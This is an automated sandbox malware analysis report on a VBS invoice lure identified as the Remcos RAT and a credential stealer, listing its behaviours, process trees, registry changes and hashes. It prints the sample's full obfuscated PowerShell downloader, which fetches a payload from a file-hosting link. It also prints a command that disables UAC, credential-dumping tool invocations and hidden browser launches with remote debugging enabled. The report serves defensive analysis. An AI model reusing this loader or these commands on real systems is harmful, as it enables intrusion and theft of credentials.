Malware Analysis Report

2024-12-01 03:07

Sample ID 241111-qfq3zszbqn
Target 11112024_1259_detalhe_fatura_20241105pd.vbs.zip
SHA256 2afec0327c04e9ee4fd90742849759324292c2b905a5e4d4444bb08275b408ab
Tags remcos remotehost collection credential_access discovery evasion rat stealer trojan
Score 10/10

Analysis Overview

score
10/10

SHA256

2afec0327c04e9ee4fd90742849759324292c2b905a5e4d4444bb08275b408ab

Threat Level: Known bad

The file 11112024_1259_detalhe_fatura_20241105pd.vbs.zip was found to be: Known bad.

Malicious Activity Summary

remcos remotehost collection credential_access discovery evasion rat stealer trojan

UAC bypass

Remcos

Remcos family

NirSoft MailPassView

NirSoft WebBrowserPassView

Detected Nirsoft tools

Blocklisted process makes network request

Uses browser remote debugging

Checks computer location settings

Legitimate hosting services abused for malware hosting/C2

Accesses Microsoft Outlook accounts

Suspicious use of NtSetInformationThreadHideFromDebugger

Suspicious use of NtCreateThreadExHideFromDebugger

Suspicious use of SetThreadContext

Enumerates physical storage devices

System Location Discovery: System Language Discovery

Suspicious behavior: MapViewOfSection

Modifies registry key

Suspicious use of AdjustPrivilegeToken

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary

Suspicious use of SetWindowsHookEx

Suspicious behavior: EnumeratesProcesses

Suspicious use of WriteProcessMemory

Enumerates system info in registry

Suspicious use of FindShellTrayWindow

Modifies registry class

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-11-11 13:12

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-11-11 13:12

Reported

2024-11-11 13:15

Platform

win7-20241023-en

Max time kernel

121s

Max time network

121s

Command Line

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\detalhe_fatura_20241105·pd.vbs"

Signatures

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WScript.exe N/A

Enumerates physical storage devices

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Processes

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\detalhe_fatura_20241105·pd.vbs"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#tervaderne Sejlklar Dispensative Synocreate Specialdepot #><#Rverhistorier Nonbreakable Warnas Prodders Prpositionsled #>$Dvekonsulenterne='Infiltrende';function Faglrereksaminernes($Militrpolitis){If ($host.DebuggerEnabled) {$Fiskerets++;$Rdbyerne=$Militrpolitis.'Length' - $Fiskerets} for ( $Episodial=4;$Episodial -lt $Rdbyerne;$Episodial+=5){$Yndlingsudtrykkets=$Episodial;$Checksumberegningen+=$Militrpolitis[$Episodial]}$Checksumberegningen}function husmandsbruget($Unvague){ .($Quersprung) ($Unvague)}$Unconfirmed=Faglrereksaminernes ' ariN Sa eVrnetSla,. Gisw IndEUnpubChefC BehL,elei ageHundnT leTDisp ';$Strandlooper=Faglrereksaminernes 'FulgMInteoUnl zmi.li ba lBel.lFriaa ,vi/coun ';$Bacillariaceous=Faglrereksaminernes 'AfgiTredilBunks upe1Paaf2V.lu ';$Alchimy='Park[SmdeN PoleDokbtOph .Proks CyceObliRSwirv aaniTyphCIntre.arbP A,to Elei SkeN P,atVildmNi raInteNKnbja RefgStoleRecoRIsla]Arch:Batt:F,scSovereDesucismeU Fo RMisaIAnsttFln YUn rpN nrRF isORamotT,eioRelicIraooJubjlInfl=Chin$.onmBForsaPersCspagiPr pLDokul BosaSc.prArc.i H pA Folc Mode .usOPsy,u.xpeSInte ';$Strandlooper+=Faglrereksaminernes 'Caes5Sven. 
Da,0Gaar Koll(cankWAl miSween SesdSf ro HakwSla,sMicr C agNUnheTLaan Une1Li j0Sind.Fuld0Pe,l;Hypo ImprWAci io.ernBo.e6Brdr4V rm; A o SilvxVanm6unde4 Obv; Che ChrerMo svFors: Non1N nc3Fleu1Shit.Nagg0Maco)Yndi SekuGac neFinec EntkIn qoMes /Tryk2Tvrd0 Ura1Woo 0 Con0Lok 1Part0Sy r1Brne ,hiFAr eiTrocrAb neEst f K.eo BesxSynd/Indk1Goor3Fen 1Gono..ogd0 Tam ';$Nondifficult76=Faglrereksaminernes ' .yaULionsS.alEPetiRSple-,igeaP nnGStareCautNSuggt dio ';$Beskrivelser=Faglrereksaminernes ' N dhSaa tHippt Batp uldsTrdo: ntu/Art /Hea.dFa rr HaeiAutovFu ieTare.Eng g ello Pr oAnalg MaclSpore wor.T lgc olyoRipem orr/StueuCondc,ymp?Pisse PouxAfl,pTe roCoenrBi ttstro=K radTa,roLnstwPhiln OvelAriso BevaRevedUdle&ChemiNe.rdpo,b=Dspe1 ProbhypnaIn,eZDoor0GradlAnfrZDismf GumeFremkSt ij AfdsSlagpYe,iVOperJFor.l St,qMeekySvo p rojyDaleHM,saF Bog2RowdYVaidiSlag_RuntuFir,VparkwIlliIMarkyBlue0Conti Bao ';$Bispevielse=Faglrereksaminernes 'Unpr>Gift ';$Quersprung=Faglrereksaminernes 'MillIVitreClasXTil ';$skudefuldes='Clysmian';$Skibsbestningerne='\Finansieringsreglen.Obj';husmandsbruget (Faglrereksaminernes 'Es e$KingGVrtslPseuO ypb udA EvaLVer :BundINel NM,lidF kssAtlaLMiniURepts Ubee plsdChorEUnwiSPara=Dr j$CheaEE,goNVeriv Co :MammA.nitpSpiopBrndDWithaSmukTbec aGlun+Biom$ olosSvinKPae IPe ibAlu sSup B Af,EAnsiS Vk.tK den Be.iReccnP ckgSik EUpaar Cenn tyrEGges ');husmandsbruget (Faglrereksaminernes ' St,$FlleGSu plTredOSubcbB ndafor lS jt:Ma.ku .jepInfaGGan,i ectrLetsD U aIudson M.lGBars=Stud$ lutb utoeKvansfjasK emer aksi TamvSyn EMaksL UnvSUdseESkraRThal.E.asSperlPBe,eLFo.miPlustfisk( imb$DdelBLrerIromaSDiskpUph,eTrauvUnd icanoeAural Sans UndEpost)Uros ');husmandsbruget (Faglrereksaminernes $Alchimy);$Beskrivelser=$upgirding[0];$Calami=(Faglrereksaminernes 'Mose$SkrugMeroLSvenoPikebJomfAKa aLAlgo:gipsbNe,ro LacNDe lDAceteCha sTeksLDe.egUdbytAfls= K.aN BuneMiliwSide-DebaoAnd bVa.sJFordEI,reCZinkTLivs Un s RenYDiscs ritT ulte Kopmmn,p.Krit$ CarUStennYnkscAgroo.nreNSanaF BimI 
FrdRVerdMHatheLithdVang ');husmandsbruget ($Calami);husmandsbruget (Faglrereksaminernes 'e pe$MaarBTrs oT.ddn Abed No eB.ansSonalVejvghexatInte.,ayoH avkeIndiaU ymdtilse S,vrRgtesCorr[L eh$svenNTrygoMa anSterdKarai MasfKlorfLoriiH.pncobtuuMololBrydtdev 7T ki6Ensn]Ph s=kvit$ PedSPhl,tCommrprogaF amnSvendnedslB wioHv loDestpNaa.eTy srbed, ');$Drollness=Faglrereksaminernes ' Rhe$Lym,BR,looConfnAfmad KaleFr ssV.ekl SprgChritcal..ForpDF iko kifwLurrnIn elBibcodereaSpatdInfeF CatiStarl Fore Ina(Nonr$ asyBHeare.lumsNyttkAudirKonsiNo pv L leImmilStunsHe neStemrEver,Afmi$Hjn E .omr Vany aat onrh Refr BiooTabud uldeY.utgPrepeud lnca hebordrLuc.aGaertRepli ,oevRecueOver)vet. ';$Erythrodegenerative=$Indslusedes;husmandsbruget (Faglrereksaminernes '.rne$ kvaGBir,LU,gao Ma bS orA haeLBibl: JibasponDAirlmBefoi rayRPo uA TvilStipSSkurUSmaaN,oshi K rF OveO blirInd,mJamisG os=Golk(KatoTb grEFamiSMarcTC.to- StuPKaffap osTLufthF gb Told$epene ecrrAkkiyStiftEr tHheatrCrewoVerid KavEJuragRav eTandnSo,vEHoldR F nA T nTEtabi FaiVS.rbESyph)unde ');while (!$Admiralsuniforms) {husmandsbruget (Faglrereksaminernes 'Mult$Sophg paulurocoI,subTepiaBevilMego:EfteDStyri atesApp kFradk ortaA ndpDyrta incc.egriSerpt Op efemitChuteDamen DessAnke=.cce$SkibtSnedrChafuPas eUnap ') ;husmandsbruget $Drollness;husmandsbruget (Faglrereksaminernes ' Ac Sbel.T C oA I fr KurtA.kl-CelisNikklBromE.roneAnespTele Brn4opt ');husmandsbruget (Faglrereksaminernes 'S,rg$Bla,GBedmlCoolo rrebTilrA Ejal Pac:C,mpAAfstDR.bsmPe,fIAfbiRH,ala CasL Hoes U eU dmynSaltI eawfDo,bOMiddRPhy MbefaSGr s= fv( MirT IntELampS AppTSpi - DegpDem A JocTCr sH Si, Bio $Col ESuper L nYUdg.TNonohMos,RDisto avtdMettE NemG loeGimmnWeekeHardRassoAAfgaTPr bIPenaVReprE Zir)bee ') ;husmandsbruget (Faglrereksaminernes 'Taag$ichtGBesmlUdd.oForsBPilaaHomol Ejs: ontBUnt LB atOForocZoogk ba.A MisDDipleMassr erd=Spar$PhotGBurkLBaltoVol BDebeAB lsLIndt:c onjFnugokap.m HasfBedrRRefeUMealkVesiLHypsoProts,epeTTavee,lubr St.+ com+ ha% Mo $FascU RelpTe,aG 
pipIAfkorAa sDTyfoIFauvnG regBogk. Epac LexOE.chUBracNJenntDe o ') ;$Beskrivelser=$upgirding[$Blockader]}$Understemmer=312115;$Leafiest15=31157;husmandsbruget (Faglrereksaminernes 'Send$,pargTerpLTalgo HisbFr ta bilLFila:Siess SupuPargpInd P PrirMyldiSubsmPhoteLegiRVverI uronVentgUdsi sta.=Byba SketGStarEK,altProp- LblCPostoQuinnDarttWalleRayaNVinrtSkr Scru$P trEs mir A byRoomtl.seHturbRHippOPatrdhalvEkbssg GenESwinNUs.fESer.rSym.ATrigT eni swavConieSal ');husmandsbruget (Faglrereksaminernes 'Stem$Clung istlFl,soAntibRefoaCounl yke:rrf AT.amuOptispen tSt krO tba pirl.ortoPhotp.orciKon tV,llhOlioeAto.cErobilysensjleaRekoe Sur .rch=Indd R s[TollS OveyKvi.sUn vt Udse Po mSamm.landC frooSubcnW atvRepreNonprPosttDist]Gard:A.ab:An iFUdhurTreeotu nm tyrBWoodaS nssAflgeShog6Evan4Sq.iSFrent,dskr Beni DkknIrregHuch( el$grssS NonuHo,epE trp edlrTmtbiSycomTeste ushrBrohiEscrnPramgYend)S ef ');husmandsbruget (Faglrereksaminernes 'Var $LawbgAddeL opaOEnkeBEspaAFyldLKant:Oilpk IntaUns mHyklmDatae marRGeneh d.sE HutRCompRVaa EGradsBrom I.dp=Br b Sl [Toi SAnemyVivis D.sTSmaaE RelmAger.RegrTBagteBohmxmuniT Van.De iESebkNMor.C hakO HanDSiloiSuriNUdbeg an] Hoe:,icr:E.paaCo pSSto cJaimiOkseI Bol. .raG OppESowaTKostsBlvetak iRFagfi BloNResoGRoto(Frke$AkkuaAnstuOb eSFroptAm rRZ,nta S iLVldeO.yonP IrrIAfstTPe.sHTandERu.fC al iT.ngNSysta TarE Eco) ha ');husmandsbruget (Faglrereksaminernes 'Un e$ T nGRe.uL LocoPan b .abaSlutlCast:H ltAPre.S TreT Elir,lepoDow lUncoOR kkgSkrk=Flor$ ranKMaria B om EvaMMispeLnkoRf.glhTekneUdk,R nfor,emoEKvalsUdsa. f mS elrUMastbOleaSFjleTAfvirSbehIHav.NMandGGri (Typ.$AfkluCirkNbegydTwi,EThorrC.ess,avsTPlanE eatMHypomB tae FalRTvrm, Dam$KoallBogsESterA sblf,uraI SaleBorgS MidTForv1 ip5Supe)Mini ');husmandsbruget $Astrolog;"

Network

Files

C:\Users\Admin\AppData\Local\Temp\CabBBF1.tmp

MD5 49aebf8cbd62d92ac215b2923fb1b9f5
SHA1 1723be06719828dda65ad804298d0431f6aff976
SHA256 b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f
SHA512 bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

Analysis: behavioral2

Detonation Overview

Submitted

2024-11-11 13:12

Reported

2024-11-11 13:15

Platform

win10v2004-20241007-en

Max time kernel

148s

Max time network

149s

Command Line

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\detalhe_fatura_20241105·pd.vbs"

Signatures

Remcos

rat remcos

Remcos family

remcos

UAC bypass

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Windows\SysWOW64\reg.exe N/A

Detected Nirsoft tools

Description Indicator Process Target
N/A N/A N/A N/A

NirSoft MailPassView

Description Indicator Process Target
N/A N/A N/A N/A

NirSoft WebBrowserPassView

Description Indicator Process Target
N/A N/A N/A N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Control Panel\International\Geo\Nation C:\Windows\System32\WScript.exe N/A

Accesses Microsoft Outlook accounts

collection
Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts C:\Windows\SysWOW64\msiexec.exe N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A drive.google.com N/A N/A

Suspicious use of NtCreateThreadExHideFromDebugger

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A

Suspicious use of NtSetInformationThreadHideFromDebugger

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 3016 set thread context of 916 N/A C:\Windows\SysWOW64\msiexec.exe C:\Windows\SysWOW64\msiexec.exe
PID 3016 set thread context of 1896 N/A C:\Windows\SysWOW64\msiexec.exe C:\Windows\SysWOW64\msiexec.exe
PID 3016 set thread context of 2372 N/A C:\Windows\SysWOW64\msiexec.exe C:\Windows\SysWOW64\msiexec.exe

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\msiexec.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A

Enumerates system info in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files\Google\Chrome\Application\Chrome.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files\Google\Chrome\Application\Chrome.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files\Google\Chrome\Application\Chrome.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Modifies registry key

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\reg.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\Chrome.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\Chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\Chrome.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 3552 wrote to memory of 3272 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3224 wrote to memory of 3016 N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\msiexec.exe
PID 3016 wrote to memory of 4356 N/A C:\Windows\SysWOW64\msiexec.exe C:\Windows\SysWOW64\cmd.exe
PID 4356 wrote to memory of 1148 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 3016 wrote to memory of 2124 N/A C:\Windows\SysWOW64\msiexec.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 2124 wrote to memory of 3184 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 3016 wrote to memory of 1440 N/A C:\Windows\SysWOW64\msiexec.exe C:\Windows\SysWOW64\msiexec.exe
PID 3016 wrote to memory of 916 N/A C:\Windows\SysWOW64\msiexec.exe C:\Windows\SysWOW64\msiexec.exe
PID 3016 wrote to memory of 1864 N/A C:\Windows\SysWOW64\msiexec.exe C:\Windows\SysWOW64\msiexec.exe
PID 3016 wrote to memory of 4068 N/A C:\Windows\SysWOW64\msiexec.exe C:\Windows\SysWOW64\msiexec.exe
PID 3016 wrote to memory of 1896 N/A C:\Windows\SysWOW64\msiexec.exe C:\Windows\SysWOW64\msiexec.exe
PID 3016 wrote to memory of 2372 N/A C:\Windows\SysWOW64\msiexec.exe C:\Windows\SysWOW64\msiexec.exe
PID 2124 wrote to memory of 2236 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe

Processes

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\detalhe_fatura_20241105·pd.vbs"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe


C:\Windows\SysWOW64\msiexec.exe

"C:\Windows\SysWOW64\msiexec.exe"

C:\Windows\SysWOW64\cmd.exe

/k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f

C:\Windows\SysWOW64\reg.exe

C:\Windows\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f

C:\Program Files\Google\Chrome\Application\Chrome.exe

--user-data-dir=C:\Users\Admin\AppData\Local\Temp\TmpUserData --window-position=-2400,-2400 --remote-debugging-port=9222 --profile-directory="Default"

C:\Program Files\Google\Chrome\Application\Chrome.exe

"C:\Program Files\Google\Chrome\Application\Chrome.exe" --type=crashpad-handler --user-data-dir=C:\Users\Admin\AppData\Local\Temp\TmpUserData /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Users\Admin\AppData\Local\Temp\TmpUserData\Crashpad --metrics-dir=C:\Users\Admin\AppData\Local\Temp\TmpUserData --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7fff70abcc40,0x7fff70abcc4c,0x7fff70abcc58

C:\Windows\SysWOW64\msiexec.exe

C:\Windows\System32\msiexec.exe /stext "C:\Users\Admin\AppData\Local\Temp\jdwblvahxqurzoaz"

C:\Windows\SysWOW64\msiexec.exe

C:\Windows\System32\msiexec.exe /stext "C:\Users\Admin\AppData\Local\Temp\jdwblvahxqurzoaz"

C:\Windows\SysWOW64\msiexec.exe

C:\Windows\System32\msiexec.exe /stext "C:\Users\Admin\AppData\Local\Temp\txclmnkjlymebcwdxqa"

C:\Windows\SysWOW64\msiexec.exe

C:\Windows\System32\msiexec.exe /stext "C:\Users\Admin\AppData\Local\Temp\txclmnkjlymebcwdxqa"

C:\Windows\SysWOW64\msiexec.exe

C:\Windows\System32\msiexec.exe /stext "C:\Users\Admin\AppData\Local\Temp\txclmnkjlymebcwdxqa"

C:\Windows\SysWOW64\msiexec.exe

C:\Windows\System32\msiexec.exe /stext "C:\Users\Admin\AppData\Local\Temp\wrhengddzgejmikhhbvivc"

C:\Program Files\Google\Chrome\Application\Chrome.exe

"C:\Program Files\Google\Chrome\Application\Chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1992,i,12248935928065961960,2414336146632246934,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=1988 /prefetch:2

C:\Program Files\Google\Chrome\Application\Chrome.exe

"C:\Program Files\Google\Chrome\Application\Chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=1832,i,12248935928065961960,2414336146632246934,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2152 /prefetch:3

C:\Program Files\Google\Chrome\Application\Chrome.exe

"C:\Program Files\Google\Chrome\Application\Chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2180,i,12248935928065961960,2414336146632246934,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2360 /prefetch:8

C:\Program Files\Google\Chrome\Application\Chrome.exe

"C:\Program Files\Google\Chrome\Application\Chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9222 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3176,i,12248935928065961960,2414336146632246934,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3196 /prefetch:1

C:\Program Files\Google\Chrome\Application\Chrome.exe

"C:\Program Files\Google\Chrome\Application\Chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9222 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3204,i,12248935928065961960,2414336146632246934,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3332 /prefetch:1

C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe

"C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"

C:\Program Files\Google\Chrome\Application\Chrome.exe

"C:\Program Files\Google\Chrome\Application\Chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9222 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4616,i,12248935928065961960,2414336146632246934,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4608 /prefetch:1

C:\Program Files\Google\Chrome\Application\Chrome.exe

"C:\Program Files\Google\Chrome\Application\Chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4568,i,12248935928065961960,2414336146632246934,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4560 /prefetch:8

C:\Program Files\Google\Chrome\Application\Chrome.exe

"C:\Program Files\Google\Chrome\Application\Chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4276,i,12248935928065961960,2414336146632246934,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4856 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

--user-data-dir=C:\Users\Admin\AppData\Local\Temp\TmpUserData --window-position=-2400,-2400 --remote-debugging-port=9222 --profile-directory="Default"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler --user-data-dir=C:\Users\Admin\AppData\Local\Temp\TmpUserData /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Users\Admin\AppData\Local\Temp\TmpUserData\Crashpad --metrics-dir=C:\Users\Admin\AppData\Local\Temp\TmpUserData --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x104,0x108,0x10c,0xe0,0x110,0x7fff709746f8,0x7fff70974708,0x7fff70974718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2128,16482620790005200904,4844294344450747913,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2144 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2128,16482620790005200904,4844294344450747913,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2200 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2128,16482620790005200904,4844294344450747913,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2980 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9222 --field-trial-handle=2128,16482620790005200904,4844294344450747913,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3284 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9222 --field-trial-handle=2128,16482620790005200904,4844294344450747913,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3304 /prefetch:1

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9222 --field-trial-handle=2128,16482620790005200904,4844294344450747913,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5360 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9222 --field-trial-handle=2128,16482620790005200904,4844294344450747913,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5092 /prefetch:1

Network


Files

memory/3272-4-0x00007FFF703D3000-0x00007FFF703D5000-memory.dmp

memory/3272-5-0x0000013AD0190000-0x0000013AD01B2000-memory.dmp

